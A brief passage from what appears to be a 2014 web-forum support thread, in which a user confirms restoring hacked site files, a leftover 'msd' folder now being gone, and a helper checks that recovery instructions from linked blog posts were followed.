All files are already restored to before the site was hacked, and the msd folder is not found anymore :)

Awesome :)

ozzy47 11-07-2014 12:08 AM

Did you also follow all the instructions in the blog posts I linked you to?

Muhammad Rahman 11-07-2014 12:10 AM

Quote:

Originally Posted by ozzy47 (Post 2521724)
Did you also follow all the instructions in the blog posts I linked you to?

yes.. all instructions done! :)

ozzy47 11-07-2014 12:11 AM

Good stuff, hopefully you won't be hacked again. :)

